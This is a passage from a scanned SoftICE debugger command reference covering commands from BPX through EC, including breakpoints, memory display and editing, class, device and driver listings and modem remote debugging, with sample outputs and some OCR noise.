Note: You can combine breakpoint count functions (BPCOUNT, BPMISS, BPTOTAL, 
BPLOG, and BPINDEX) with conditional expressions to monitor and control 
breakpoints based on the number of times a particular breakpoint has or has not 
triggered. See Chapter 6, Using Breakpoints,'' in the Using SoftICE manual. 


%Use 

Use the BPX command to define breakpoints that trigger whenever the instruction 
at the 

specified address is executed. 


The address parameter must point at the first byte of the instruction opcode of 
the instruction 

where the breakpoint is being set. If no address is specified and the cursor is 
in the Code 
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window when you begin to type the command, a point-and-shoot breakpoint is set 
where the 

implied address is that of the instruction at the cursor location in the Code 
window. If you 

define a point-and-shoot breakpoint at an address where a breakpoint already 
exists, the 

existing breakpoint is cleared. 


Note: Use the EC command (default key F6) to move the cursor into the Code 
window. 

If the cursor is not in the Code window when you enter the BPX command, you 
must specify 

an address. If you specify only an offset, the current CS register value is 
used as the segment. 


The BPX command normally places an INT 3 instruction at the breakpoint address. 
This 

breakpoint method is used instead of assigning a debug register to make more 
execution 

breakpoints available. If you need to use a breakpoint register, for example, 
to set a breakpoint 

on code not yet loaded in a DOS VM, set an execution breakpoint with the BPM 
command 

and specify X as the verb. 


If you try to set a BPX at an address that is in ROM, a breakpoint register is 
automatically 

used for the breakpoint instead of the normal placement of an INT 3 at the 
target address 

(because ROM cannot be modified). 


The BPX command accepts 16-bit Windows module names as an address parameter. 
When 

you enter a 16-bit module name, SoftICE sets a BPX-style breakpoint on every 
exported entry 

point in the module. 


Example: BPX KERNEL sets a breakpoint on every function in the 16-bit Windows 
module 

KRNL386.EXE. This can be very useful is you need to break the next time any 

function in a DLL is called. 


SoftICE supports a maximum of 256 breakpoints when using this command. 


For Windows 3.1 and Windows 95 

BPX breakpoints in DOS VMs are tied to the VM they were set in. This is 
normally what you 

would like when debugging a DOS program in a DOS VM. However, there are 
situations 

when you may want the breakpoint to go off at a certain address no matter what 
VM is 

currently mapped in. This is usually true when debugging in DOS code or in a 
TSR that was 

run before Windows was started. In these cases, use a BPM breakpoint with the X 
verb 

instead of BPX. 


For Windows 95 

BPX breakpoints set in the range 400000 - 7FFFFFFF (WIN32 applications) are 
address- 

context sensitive. That is, they are only triggered when the context in which 
they were set is 
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active. If a breakpoint is set in a DLL that exists in multiple contexts, 
however, the breakpoint 
will exist in all contexts. 


For Windows NT 

Any breakpoint set on an address below 80000000h (2 GB) is address-context 
sensitive. This 

includes WIN32, WIN16, and DOS V86 applications. Take care to ensure you are in 
the 

correct context before setting a breakpoint. 


%Example 

This example sets an execution breakpoint at the instruction 10h bytes past the 
current 

instruction pointer (CS:EIP). 

BPX eip+10 


This example sets an execution breakpoint at source line 1234 in the current 
source file (refer 

to FILE on page 81). 

BPX .1234 


For Windows 95 and Windows NT 

The following is an example of the use of a conditional expression to qualify a 
breakpoint. In 

this case, the breakpoint triggers if the EAX register is within the specified 
range: 

BPX eip if eax > 1ff && eax <= 300 


In this example, a breakpoint action is used to have SoftICE automatically dump 
a parameter 

for a call. Every time the breakpoint is hit, the contents of the string 
pointed to by the current 

DS:DX will be displayed in the Data window. 

BPX 80023455 do ‘db ds:dx'' 

See Also FILE 


:BSTAT 
ABSTAT Windows 95, Windows NT Breakpoints 
ADisplay statistics for one or more breakpoints. 


%Syntax 
BSTAT [breakpoint-index] 


breakpoint-index: Breakpoint index number. 


%Use 

Use BSTAT to display statistics on breakpoint hits, misses, and whether 
breakpoints popped 

up or were logged. A breakpoint will be logged to the history buffer instead of 
popping up if it 

has a conditional expression that uses the BPLOG expression macro. 


Because conditional expressions are evaluated when the breakpoint is triggered, 
it is possible 

to have evaluation run-time errors. Examples of this are when a virtual symbol 
is referenced, 

and that symbol has not been loaded, or a reference to symbol cannot be 
resolved because the 

memory is not present. In these cases, and possibly others, an error will be 
generated and 

noted. The Status and Scode fields under the Misc. column contain error 
information which 
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indicates what problem, if any, has occurred. 


%Output 
For each breakpoint displayed the following information also appears: 
BP # Breakpoint index, and if disabled, an * (asterisk). 


Totals Category: 

Hits 

Total number of times SoftICE has evaluated the breakpoint. 
Breaks 

Total number of times the breakpoint has evaluated TRUE, and 
SoftICE has either popped up, or logged the breakpoint. 

Popups 

Total number of times the breakpoint caused SoftICE to pop up. 
Logged 

Total number of times the breakpoint has been logged. 

Misses 

Total number of times the breakpoint evaluated to FALSE, and no 
breakpoint action was taken. 

Errors 

Total number of times that the evaluation of a breakpoint resulted in a 
error. 


Current Category: 

Hits 

Current number of times the breakpoint has evaluated TRUE, but did 
not pop up because the count had not expired. (Refer to expression 
macro BPCOUNT. ) 

Misses 

Current number of times the breakpoint has evaluated FALSE and/or 
the breakpoint count has not expired. 


Miscellaneous Category: 

Status 

SoftICE internal status code for the last time the breakpoint was 
evaluated, or zero if no error occurred. 

Scode 

Last non-zero SoftICE internal status code, or zero if no error has 
occurred. 

Cond. 

Yes if the breakpoint has a conditional expression, otherwise No. 
Action 

Yes if the breakpoint has a defined breakpoint action, otherwise No. 


%Example 

The following is an example using the BSTAT command for breakpoint #0: 
:BSTAT 0 

Breakpoint Statistics for #00 

BP # *00 

Totals 
Hits 2 
Breaks 
Popups 
Logged 
Misses 
Errors 
Current 
Hits 0 
Misses 0 
Misc 
Status 0 
SCode 0 
Cond. No 


O OONN 
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Action Yes 


:C 
AC Windows 3.1, Windows 95, Windows NT Miscellaneous 
ACompare two data blocks. 


%Syntax 
C start-address 1 length start-address-2 


start-address: Start of first memory range. 
length: Length in bytes. 
start-address-2: Start of second memory range. 


%Use 

The memory block specified by start-address and length is compared to the 
memory block 

specified by the second start address. 


when a byte from the first data block does not match a byte from the second 
data block, both 
bytes display, along with their addresses. 


%Example 

The following example compares 10h bytes starting at memory location 
DS:805FF000h to 

the 10h bytes starting at memory location DS:806FF000h. 

C ds:805ff000 1 10 ds:806ff000 


: CLASS 
ACLASS Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay information on Window classes. 


%Syntax 
For Windows 3.1 
CLASS [module-name] 


For Windows 95 
CLASS [-x][task-name] 


For Windows NT 
CLASS [-x][process-type | thread-type | module-type | class-name] 


module-name: Any currently loaded Windows module. Not all Windows modules 
have classes registered. 

-X: Display complete Windows 95 or Windows NT internal CLASS data 
structure, expanding appropriate fields into more meaningful forms. 

task-name: 
Any currently executing 16- or 32-bit task. 

process-type: Process name, process ID, or process handle. 
thread-type Thread ID or thread address (KTEB). 

module-type: Module name or module handle. 

class-name: Name of a registered class window. 


%Use For Windows 95 

The operating system maintains the standard window classes in the 16-bit user 
module (per 

Windows 3.1). The operating system maintains all other window classes in 
separate lists on 

behalf of each process. Each time a process or one of its DLLs registers a new 
window class, 

registration places that class on one of two lists: 

The application global list contains classes registered with the CS_GLOBAL 

attribute. 
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They are accessible to the process or any of its DLLs. 

The application private list contains non-global classes. Only the 
registering module can 

access them. 


Finally, any process or DLL that attempts to superclass one of the standard 
window controls, 

for example, LISTBOX, receives a copy of that class. The copy resides in a 
process-specific 

system-superclass list. By making a copy of the standard class, a process or 
DLL can superclass 

any standard windows control without affecting other processes in the system. 


The process-specific class lists display in the following order: 
application private 
application global 
system superclassed 

In the output, dashed lines separate each list. 


For Windows NT 

The architecture of class information under Windows NT is similar to that of 
Windows 95 in 

that class information is process specific and the operating system creates 
different lists for 

global and private classes. Beyond this, the two operating systems have 
significant differences 

in how super-classing a registered window class is implemented. 


Under Windows NT, registered window classes are considered templates that 
describe the base 

characteristics and functionality of a window (similar to the C++ notion of an 
abstract class). 

when a window of any class is created, the class template is instanced by 
making a physical 

copy of the class structure. This instanced class is stored with the windows 
instance data. Any 

changes to the instanced class data does not affect the original class 
template. This concept is 

further extended when various members of the windows instanced class structure 
are 

modified. when this occurs, the instanced class is instanced again, and the new 
instance 

points to the original instance. Registered classes act as templates from which 
instances of a 

particular class can be created; in effect this is object inheritance. This 
inheritance continues as 

changes are made to the base functionality of the class. 


If you do not specify the type parameter, the current context is assumed 
because the class 

information is process specific. A process-name always overrides a module of 
the same name. 


To search by module when there is a name conflict, use the module handle (base 
address or 

module database selector). Also, module names are always context sensitive. If 
the module is 

not loaded in the current context (or the CSRSS context), the CLASS command 
interprets 

the module name as a class name instead. 


%Output 
For each class, the following information is shown: 
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Class Handle 

Offset of a data structure within USER. Refers to windows of this class. 

Class Name 

Name that was passed when the class was registered. If no name was 
passed, the atom displays. 

Owner 

Module that has registered this window class. 


Window Procedure Address of the window procedure for this window class. 
Styles Bitmask of flags specified when the class was registered. 


%Example For Windows 3.1 

The following example uses the CLASS command to display all the classes 
registers by the 

MSWORD module. 

. CLASS msword 


Note: There are symbols for all of the window procedures, because SoftICE 
includes all of the 

exported symbols from USER.EXE. If a symbol is not available for the window 
procedure, a hexadecimal address displays. 


Handle Name Owner Window Procedure 
0F24 #32772 USER TITLEWNDPROC 

OEFC #32771 USER SWITCHWNDPROC 
0ED4 #32769 USER DESKTOPWNDPROC 
0E18 MDIClient USER MDICLNTWNDPROC 
ODDC ComboBox USER COMBOBXWNDPROC 
ODAO ComboLBox USER LBBOXTLWNDPROC 
0D64 ScrollBar USER SBWNDPROC 

0D28 ListBox USER LBOXCTLWNDPROC 
OCF®O Edit USER EDITWNDPROC 


:CLS 

ACLS WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 
AAlt-F5 

AClear the Command window. 


%Syntax 
CLS 


%Use 

The CLS command clears the SoftICE Command window, all display history, and 
moves the 

prompt and the cursor to the upper lefthand corner of the Command window. 


: CODE 
ACODE Windows 3.1, Windows 95, Windows NT Customization 
ADisplay instruction bytes. 


%Syntax 
CODE [on | off] 


%Use 
The CODE command controls whether or not the actual hexadecimal bytes of an 
instruction 
display when the instruction is unassembled. 
If CODE is ON, the instruction bytes display. 
If CODE is OFF, the instruction bytes do not display. 
CODE with no parameters displays the current state of CODE. 
The default is CODE mode OFF. 


%Example 
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The following command causes the actual hexadecimal bytes of an instruction to 
display 

when the instruction is unassembled. 

CODE on 


: COLOR 
ACOLOR Windows 3.1, Windows 95, Windows NT Customization 
ADisplay or set the screen colors. 


%Syntax 
COLOR [normal bold reverse help line] 


normal: Foreground/background attribute that displays normal text. 
Default = 07h grey on black. 

bold: Foreground/background attribute that displays bold text. 
Default = OFh white on black. 

reverse: Foreground/background attribute that displays reverse video text. 
Default = 71h blue on grey. 

help: Foreground/background attribute that displays the help line 
underneath the Command window. 
Default = 30h black on cyan. 

line: Foreground/background attribute that displays the horizontal lines 
between the SoftICE windows. 
Default = 02h green on black. 


%Use 

Use the COLOR command to customize the SoftICE screen colors on a color 
monitor. Each 

of the five specified colors is a hexadecimal byte where the foreground color 
is in bits 0-3 and 

the background color is in bits 4-6. This is identical to the standard CGA 
attribute format 

where there are 16 foreground colors and 8 background colors. 


The actual colors represented by the 16 possible codes are listed in the 
following table: 


Code_Color Code_Color 
(0) black A light green 
1 blue B light cyan 
2 green Cc light red 
3 cyan D light magenta 
4 red E yellow 
5 magenta F white 
6 brown 
7 grey 
8 dark grey 
) light blue 
%Example 


This command causes the following color assignments: 
COLOR 7 f 71 30 2 


normal text: grey on black 

bold text: white on black 
reverse video text: blue on grey 
help line: black on cyan 
horizontal line: green on black 


: CPU. 
ACPU Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the registers. 
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%Syntax 
CPU [-i] 


-i: Displays the I/0 APIC. 


%Use 
The CPU command shows all the CPU registers (general, control, debug, and 
segment). 


For Windows NT 

If your PC contains a multi-processor mother board that uses an 1/0 APIC as an 
interrupt 

controller, the CPU command displays the CPU local and 1/0 APICS. 


%Example 

The following example lists the sample output from the CPU command under 
Windows 95 

or Windows NT on systems that do not use an I/0 APIC: 


Processor 00 Registers 

CS:EIP=0008:8013D7AE SS:ESP=0010:8014AB7C 
EAX=00000041 EBX=FFDFF000 ECX=00000041 EDX=80010031 
ESI=80147940 EDI=80147740 EBP=FFDFF600 EFL=00000246 
DS=0023 ES=0023 FS=0030 GS=0000 

CRO=8000003F PE MP EM TS ET NE PG 

CR2=C13401D6 

CR3=00030000 

CR4=00000011 VME PSE 

DRO=00000000 

DR1=00000000 

DR2=00000000 

DR3=00000000 

DR6=FFFFOFF0 

DR7=00000400 

EFL=00000246 PF ZF IF IOPL=0 


The following example lists the sample output from the CPU command under 
Windows NT 
on a system that uses an 1/0 APIC: 


Processor 00 Registers 

CS:EIP=0008:8013D7AE SS:ESP=0010:8014AB7C 
EAX=00000041 EBX=FFDFF000 ECX=00000041 EDX=80010031 
ESI=80147940 EDI=80147740 EBP=FFDFF600 EFL=00000246 
DS=0023 ES=0023 FS=0030 GS=0000 

CRO=8000003F PE MP EM TS ET NE PG 

CR2=C13401D6 

CR3=00030000 

CR4=00000011 VME PSE 

DRO=00000000 

DR1=00000000 

DR2=00000000 

DR3=00000000 

DR6=FFFFOFF0 

DR7=00000400 

EFL=00000246 PF ZF IF IOPL=0 

-------- Local apic-------- 

ID: 0 

Version: 30010 
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Task Priority: 41 
Arbitration Priority: 41 
Processor Priority: 41 
Destination Format: FFFFFFFF 
Logical Destination: 1000000 
Spurious Vector: 11F 
Interrupt Command: 3000000:60041 
LVT (Timer): 300FD 

LVT (LintOo): 1001F 

LVT (Lint1): 84FF 

LVT (Error): E3 

Timer Count: 3F94DB0O 

Timer Current: 23757E0 

Timer Divide: B 


The following example lists the sample output from the CPU -i command under 
Windows 
NT on a system that uses an I/0 APIC: 


Inti Vector Delivery Status Trigger Dest Mode Destination 
01 91 Low. Pri Idle Edge Logical 01000000 
03 61 Low. Pri Idle Edge Logical 01000000 
04 71 Low. Pri Idle Edge Logical 01000000 
08 D1 Fixed Idle Edge Logical 01000000 
OC 81 Low. Pri Idle Edge Logical 01000000 
OE B1 Low. Pri Idle Edge Logical 01000000 
1/0 unit id register: 0E000000 
I/0 unit version register: 000F0011 


: CR 
ACR Windows 3.1 SystemInformation 
ADisplay the control registers. 


%Syntax 
cr 


%Use 

The CR command displays the contents of the three control registers CRO, CR2, 
and CR3, 

and the debug registers in the Command window. CRO is the processor control 
register. CR2 

is the register in which the processor stores the most recently accessed 
address that resulted in 

a page fault. CR3 contains the physical address of the system's page directory 
(refer to PAGE 

on page 150). 


%Example 
The following example lists the sample output from a CR command: 
CR0=8000003B PE MP TS ET NE PG 
CR2=000CC985 
CR3=002FE000 
CR4=00000008 DE 
DR1=00000000 
DR2=00000000 
DR3=00000000 
DR6=FFFFOFFO 
DR7=00000400 


:CSIP 
ACSIP Windows 3.1 Breakpoints 
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ASet CS:EIP (instruction pointer) memory range qualifier for all breakpoints 
(for 16-bit 
Aprograms only). 


%Syntax 
CSIP [off | [not] start-address end-address | Windows-module-name] 


off: Turns off CSIP checking. 
not Breakpoint only occurs if the CS:EIP is outside the specified range. 
start-address: Beginning of memory range. 
end-address: End of memory range. 
Windows-module-name: If you specify a valid Windows-module-name instead of a 
memory 
range, the range covers all code areas in the specified Windows 
module. 


%Use For Windows 3.1 

The CSIP command qualifies breakpoints so that the code that causes the 
breakpoint must 

come from a specified memory range. This function is useful when a program is 
suspected of 

accidentally modifying memory outside of its boundaries. 


when breakpoint conditions are met, the instruction pointer (CS:EIP) is 
compared to the 

specified memory range. If it is within the range, the breakpoint activates. To 
activate the 

breakpoint only when the instruction pointer (CS:EIP) is outside the range, use 
the NOT 

parameter. 


Because 16-bit Windows programs are typically broken into several code segments 
scattered 

throughout memory, you can input a Windows module name as the range. If you 
enter a 

module name, the range covers all code segments in the specified Windows 
program or DLL. 

when you specify a CSIP range, it applies to ALL breakpoints that are currently 
active. 

If do not specify parameters, the current memory range displays. 


For Windows 95 and Windows NT 

For 32-bit code, this command is obsolete. Use conditional expressions to 
achieve this 

functionality. CSIP still works for 16-bit code and modules. 


%Example 

The following command causes breakpoints to occur only if the CS:EIP is NOT in 
the ROM 

BIOS when the breakpoint conditions are met. 

CSIP not $f000:0 $ffff:0 


The following command causes breakpoints to occur only if the Windows program 
CALC 

causes them. 

CSIP calc 


:D 
AD Windows 3.1, Windows 95, Windows NT Display/ChangeMemory 
ADisplay memory. 


%Syntax 
For Windows 3.1 
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D[size] [address] 


For Windows 95 and Windows NT 
D[size] [address [1 length]] 
size 


%Use 
The D command displays the memory contents at the specified address. 


The contents display in the format of the size you specify. If you do not 
specify a size, the last 

size used displays. The ASCII representation displays for the byte, word, and 
double word 

hexadecimal formats. 


For the dword format, data is displayed in two different ways. 

If the displayed segment is a 32-bit segment, the dwords display as 32-bit 
hexadecimals 

(eight hexadecimal digits). 

If the displayed segment is a 16-bit segment (VM segment or LDT selector), 
the dwords 

display as 16:16 pointers (four hexadecimal digits ':' four more hexadecimal 
digits). 


If you do not specify an address, the command displays memory at the next 
sequential address 

after the last byte displayed in the current Data window. 

If the Data window is visible, the data displays there; otherwise, it displays 
in the Command 

window. In the Command window, either eight lines display or one less than the 
length of the 

window. 


Value__ Description 
Byte 
Word 
Double Word 
Short Real 
Long Real 
10-Byte Real 


HACTVOZOO 


For floating point values, numbers can display in the following format: 
[leading sign] decimal-digits . decimal-digits E sign exponent 
The following ASCII strings can also display for real formats: 


For Windows 95 and Windows NT 

If an L parameter followed by a length is specified, SoftICE displays the 
requested number of 

bytes to the Command window regardless of whether the Data window is visible. 
SoftICE 

always displays whole rows. If the length is not a multiple of rows, SoftICE 
will round up. 


This command is useful when dumping large amounts of data to the Command window 
for 
the purpose of logging it to a file. 


%Example 

Displays the memory starting at address ES:1000h in word format and in ASCII 
format. 

DW es:1000 

For Windows 95 and Windows NT 
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The following command displays 4KB of memory starting at address SS:ESP in 
dword 

format. The data is displayed in the Command window. 

.:DD ss:esp 1 1000 


String Exponent: Mantissa Sign 

Not A Number all 1'S NOT 0 +/- 
Denormal all 0'Ss NOT 0 +/- 

Invalid 10 byte only with mantissa=0 
Infinity all 1's 0 +/- 


: DATA 

ADATA WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 
Mindows 3.1 - F12 

AChange to display another Data window. 


%Syntax 
DATA [window-number] 


window-number: Number of the Data window you want to view. 
This can be 0, 1, 2, or 3. 


%Use 

SoftICE supports up to four Data windows. Each Data window can display a 
different address 

and/or format. Only one Data window is visible at any time. Specifying DATA 
without a 

parameter just switches to the next Data window. The windows are numbered from 
O to 3. 

This number displays on the righthand side of the line above the Data window. 
If you specify 

a window-number after the DATA command, SoftICE switches to display that 
window. The 

DATA command is most useful when assigned to a function key. See Chapter 8, 


° Customizing SoftICE,'' in the Using SoftICE manual. 


%Example 
Changes the Data window to Data window number 3. 
DATA 3 


: DEVICE 
ADEVICE Windows NT System Information 
ADisplay information on Windows NT devices. 


%Syntax 
DEVICE [device-name | pdevice-object] 


%Use 

The DEVICE command displays information on Windows NT device objects. If the 

DEVICE command is entered without parameters, summary information displays for 
all 

device objects found in the \Device directory. However, if a specific device 
object is indicated, 

either by its object directory name (device-name) or object address (pdevice- 
object), more 

detailed information displays. 


If a directory is not specified with a device-name, the DEVICE command attempts 
to locate 

the named device object in the \Device object directory. To display information 
about a device 
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object that is not located in the \Device directory, specify the complete 
object path name of 

the device object. when displaying information about a specified device, the 
DEVICE 

command displays fields of the DEVICE_OBJECT data structure as defined in 
NTDDK.H. 

%Output The following fields are shown as summary information: 


RefCnt 

Device object's reference count. 

DrvObj 

Pointer to the driver object that owns the device object. 
Next Dev 


Pointer to the next device object on the linked list of device objects 
that were created by the same driver. 

AttDev 

Pointer to a device object that has been attached to the displayed 
object via an IoAttachDeviceObject call. Attached device objects are 
essentially IRP filters for the devices to which they are attached. 
CurIrp 

Pointer to the IRP currently being serviced for the device object by the 
device object's driver. 

DevExten 

Pointer to device driver-defined device object extension data structure. 
Name 

Name of the device, if it has one. 


The following are some fields shown when detailed information is printed: 


Flags 

Definition of the device object's attributes such as whether 1/0 
performed on the device is buffered or not. 

Vpb 

Pointer to the device's associated volume parameter block. 

Device Type 

User-defined or pre-defined value that SoftICE translates to a name. 


%Example 

The following example shows the DEVICE command output with no parameters. It 
results in 

SoftICE printing summary information on all device objects in the \Device 
object directory. 

DEVICE 


This example uses the DEVICE command with the BEEP device object's name. 
DEVICE beep 

RefCnt DrvObj NextDev AttDev CurIrp DevExten Name 

00000000 FD8CD910 00000000 00000000 00000000 FD8CD868 Beep 
Timer* : 00000000 

Flags : 00000044 DO_BUFFERED_IO | DO_DEVICE_HAS_NAME 
Characteristics : 00000000 

Vpb* : 00000000 

Device Type : 1 FILE _DEVICE_BEEP 

StackSize : 1 

&Queue : FD8CD7E4 

AlignmentRequirement: 00000000 FILE BYTE_ALIGNMENT 
&DeviceQueue : FD8CD810 

&Dpc : FD8CD824 

ActiveThreadCount : 00000000 

Securitybescriptor* : E10E2528 

&beviceLock : FD8CD84C 

SectorSize : 0000 

Sparel : 0000 
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DeviceObjectExtn* : FD8CD8B8 

Reserved* : 00000000 

RefCnt DrvObj NextDev AttDev CurIrp DevExten Name 

00000000 FD8CD910 00000000 00000000 00000000 FD8CD868 Beep 

00000015 FD89E730 00000000 00000000 00000000 FD89C968 NwlnkIpx 
00000001 FD892170 00000000 00000000 00000000 FD8980E8 Netbios 
00000000 FD89D730 00000000 00000000 00000000 FD897D68 Ip 

00000001 FD8CBB70 00000000 00000000 FD8DAA08 FD8CAF88 KeyboardClasso 
00000001 FD8C9F30 00000000 00000000 00000000 FD8C60F0 Video0 
00000001 FD8C9C90 00000000 00000000 00000000 FD8C50F8 Video1 
00000001 FD8CC530 00000000 00000000 FD8DAC08 FD8CBF88 PointerClass0 
00000001 FD8DB550 FD8D3030 00000000 00000000 FD8D3FC8 RawTape 
00000007 FD89D730 FD897CBO 00000000 00000000 FD897C48 Tcp 

00000001 FD88A990 00000000 00000000 00000000 FD88A8A8 ParallelPorto 
00000003 FD8B3730 00000000 00000000 00000000 FD8A40E8 NE20001 


: DEX 
ADEX Windows 3.1, Windows 95, Windows NT Customization 
ADisplay or assign a Data window expression. 


%Syntax 
DEX [data-window-number [expression]] 


data-window-number: Number from 0 to 3 indicating which Data window to use. 
This 
number displays on the righthand side of the line above the Data 
window. 


%Use 

The DEX command assigns a data expression to any of the four SoftICE Data 
windows. 

Every time SoftICE pops up, the expressions are re-evaluated and the memory at 
that location 

displays in the appropriate Data window. This is useful for displaying changing 
memory 

locations where there is always a pointer to the memory in either a register or 
a variable. The 

data displays in the current format of the Data window: either byte, word, 
dword, short real, 

long real, or 10-byte real. This command is the same as entering the command 

D expression 
every time SoftICE pops up. 


If you type DEX without parameters, it displays all the expressions currently 
assigned to the 
Data windows. 


To unassign an expression from a Data window, type DEX followed by the data- 
window- 
number, then press Enter. 


To cycle through the four Data windows, use the DATA command. Refer to DATA on 


page 
63. 


%Example 
Every time SoftICE pops up, Data window © contains the contents of the stack. 
DEX O ss:esp 


Every time SoftICE pops up, Data window 1 contains the contents of the memory 
pointed at 

by the public variable PointerVariable. 

DEX 1 @pointervariable 
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See Also DATA 


:DIAL 
ADIAL Windows 95, Windows NT Customization 
ARedirect console to modem. 


%Syntax 
DIAL [on [com-port] [baud-rate] [i=init-string] [p=number] | off ] 


com-port :If no com-port is specified it uses COMI. 

baud-rate :Baud-rate to use for modem communications. The default is 38400. 
The rates are 1200, 2400, 4800, 9600, 19200, 23040, 28800, 38400, 
57000, 115000. 

i=init-string Optional modem initialization string. 

p=number Telephone number. 


%Use 

The DIAL command initiates a call to a remote machine via a modem. The remote 
machine 

must be running SERIAL.EXE and be waiting for a call. Once a connection is 
established, 

SoftICE input is received from the remote machine and SoftICE output is sent to 
the remote 

machine. No input is accepted from the local machine except for the pop-up hot 
key 

sequence. 


You can specify the modem initialization string and phone number within the 
SoftICE 

configuration settings, so that the strings they specify become the defaults 
for the i and p 

command-line parameters. Refer to Chapter 8, © Customizing Softice'' in the 
Using SoftICE 

manual. 


On the remote machine, only the com-port, baud-rate, and init parameters should 
be 
specified to SERIAL.EXE. 


%Example 

The following is an example of the DIAL command: 

DIAL on 2 19200 i=atx0 p=9,555-5555,,,1000 

The command tells SoftICE to first initialize the modem on com-port 2 with the 
string, 

°“’atx0,'' and then to make a call through the modem to the telephone number 9- 
555 -5555 

extension 1000. Commas can be used in the phone number, just as with 
traditional modem 

software, to insert delays into the dialing sequence. 


The following example shows the syntax expected by SERIAL.EXE when running it 
ona 

remote machine so that it answers a DIAL command from the local machine: 
SERIAL on [com-port] [baud-rate] i"init-string" 


The following SERIAL.EXE command-line uses a modem initialization string of 
“’atx0'' to 

answer a call (at 19200 bps) through a modem on the remote machine's COM1 
serial port. 


The command line is entered on the remote machine. 
SERIAL on 1 19200 i"atx0" 
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When the remote debugging session is complete, enter the DIAL OFF command from 
the 

remote machine to terminate the debugging session and hang up the modem. 

The following are examples of the Dial initialization and Phone number strings 
in the Remote 


Debugging SoftICE configuration settings: 


Dial initialization string: atx0 

Telephone number string: 9,555-5555,,,1000 

With the Dial initialization string in place, SoftICE always initializes the 
modem specified in 

DIAL commands with © ATX0'', unless the DIAL command explicitly specifies an 
initialization string. 


with the Phone initialization string in place, SoftICE always dials the 
specified number when 

executing DIAL commands, unless the DIAL command explicitly specifies a phone 
number. 


: DRIVER 
ADRIVER Windows NT SystemInformation 
ADisplay information on Windows NT drivers. 


%Syntax 
DRIVER [driver-name | pdriver-object] 


%Use 

The DRIVER command displays information on Windows NT drivers. If the DRIVER 

command is entered without parameters, summary information is shown for all 
drivers found 

in the \Driver directory. However, if a specific driver is indicated, either by 
its object directory 

name (driver-name), or by its object address (pdriver-object), more detailed 
information is 

displayed. 


If a directory is not specified with the driver-name, the DRIVER command 
attempts to locate 

the named driver in the \Driver object directory. To display information about 
a driver that is 

not located in the \Driver directory, you must specify the complete object path 
name of the 

driver. 


when displaying detailed information about a specified driver, the DRIVER 
command 
displays the fields of the DRIVER_OBJECT data structure as defined in NTDDK.H. 


%Output 

The following fields are shown as summary information: 
Start 

Base address of the driver. 

Size 

Driver's image size. 

DrvSect 

Pointer to driver module structure. 

Count 

Number of times the registered reinitialization routine has been 
invoked for the driver. 

DrvInit 

Address of the driver's DriverEntry routine. 
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DrvStalo 

Address of the driver's StartIo routine. 
DrvUunld 

Address of the driver's Unload routine. 
Name 

Name of the driver. 


The following is shown when detailed information is printed: 
Device0Object 

Pointer to the first device object on the driver's linked list of device 
objects that it owns. 

Flags 

Field is a bit-mask of driver flag. The only flag currently documented 
is DRVO_UNLOAD_INVOKED. 

FastIoDispatch 

Pointer to the driver's fast 1/0 dispatch data structure, if it has one. 
File System Drivers typically have a fast 1/0 routines defined for them. 
Information on the structure can be found in NTDDK.H. 

Handler 

Addresses Upon initialization, driver's can register handlers that are called 
when 

the driver receives specific IRP request types. Each handler address is 
listed along with the IRP major function it processes for the driver. 


%Example 

The following example shows the output of the DRIVER command with no 
parameters. This 

results in SoftICE printing summary information on all the drivers in the 
\Driver object 

directory. 


DRIVER 

The following is an example of the DRIVER command with the BEEP.SYS driver 
object's 

name as a parameter. From the listing it can be seen that the driver's first 
device object is at 

FD8CD7BOh, and that it has 4 IRP handler routines registered. 


DRIVER beep 

Start Size DrvSect Count DrvInit DrvStaIo DrvUnld Name 

FB030000 00000E20 FD8CDA88 00000000 FB0302EE FB0305E8 FB0306E2 Beep 
DeviceObject* : FD8CD7B0 

Flags : 00000000 

HardwareDatabase : \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM 
FastIoDispatch* : 00000000 

IRP_MJ_CREATE at 8:FB03053C 

IRP_MJ_CLOSE at 8:FB03058A 

IRP_MJ_DEVICE_CONTROL at 8:FB0304C6 

IRP_MJ_CLEANUP at 8:FB030416 

Start Size DrvSect Count DrvInit DrvStalIo DrvUnld Name 

FB030000 00000E20 FD8CDA88 00000000 FB0302EE FB0305E8 FB0306E2 Beep 
FB130000 0000D3A0 FD89E8C8 00000000 FB13B7BF 00000000 FB136789 NwlnkIpx 
FB050000 00002320 FD8CD1A8 00000000 FB050AF2 FB0508BE 00000000 Mouclass 
FB060000 00002320 FD8CBC48 00000000 FB060AF2 FB0608C0 00000000 Kbdclass 
FB070000 00003860 FD8CAE48 00000000 FB070BOC 00000000 00000000 VgaSave 


:E 
AE Windows 3.1, Windows 95, Windows NT Display/ChangeMemory 
AEdit memory. 


%Syntax 
E[size] [address [data-list]] 
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size 
data-list: List of data objects of the specified size (bytes, words, double 
words, 
short reals, long reals, or 10-byte reals) or quoted strings separated by 
commas or spaces. The quoted string can be enclosed with single 
quotes or double quotes. 


%Use 

If you do not specify data-list, the cursor moves into the Data window where 
you can edit the 

memory in place. If you specify a data-list, the memory is immediately changed 
to its new 

values. 


If the Data window is not currently visible, it is automatically made visible. 
Both ASCII and 

hexadecimal edit modes are supported. To toggle between the ASCII and 
hexadecimal display 

areas, press the Tab key. 


If you do not specify a size, the last size used is assumed. 


Enter valid floating point numbers in the following format: 
[leading sign] decimal-digits . decimal-digits E sign exponent 
Example: A valid floating point number is -1.123456 E-19 


%Example 

The following command moves the cursor into the Data window for editing. The 
starting 

address in the Data window is at DS:1000h, and the data displays in hexadecimal 
byte format 

as well as in ASCII. The initial edit mode is hexadecimal. 

EB ds:1000 

Value Description 

B Byte 

W Wo rd 

D Double Word 

S Short Real 

L Long Real 

T 10-Byte Real 


The next command moves the null terminated ASCII string 'Test String' into 
memory at 

location DS:1000h. 

EB ds:1000 'Test String',0 


This command moves the short real number 3.1415 into the memory location 
DS:1000h. 
ES ds:1000 3.1415 


EC 

NEC WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 
NF6 

AEnter or exit the Code window. 


%Syntax 
EC 


%Use 
The EC command toggles the cursor between the Code window and the Command 
window: 
If the cursor is in the Command window, it moves to the Code window. 
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If the cursor is in the Code window, it moves to the Command window. 
If the Code window is not visible when the command is entered, it is made 
visible. 


When the cursor is in the Code window, several options become available that 
make 
debugging much easier. These options are as follows: 
Set point-and-shoot breakpoints 
Set these with the BPX command. If you do not specify parameters with the BPX 
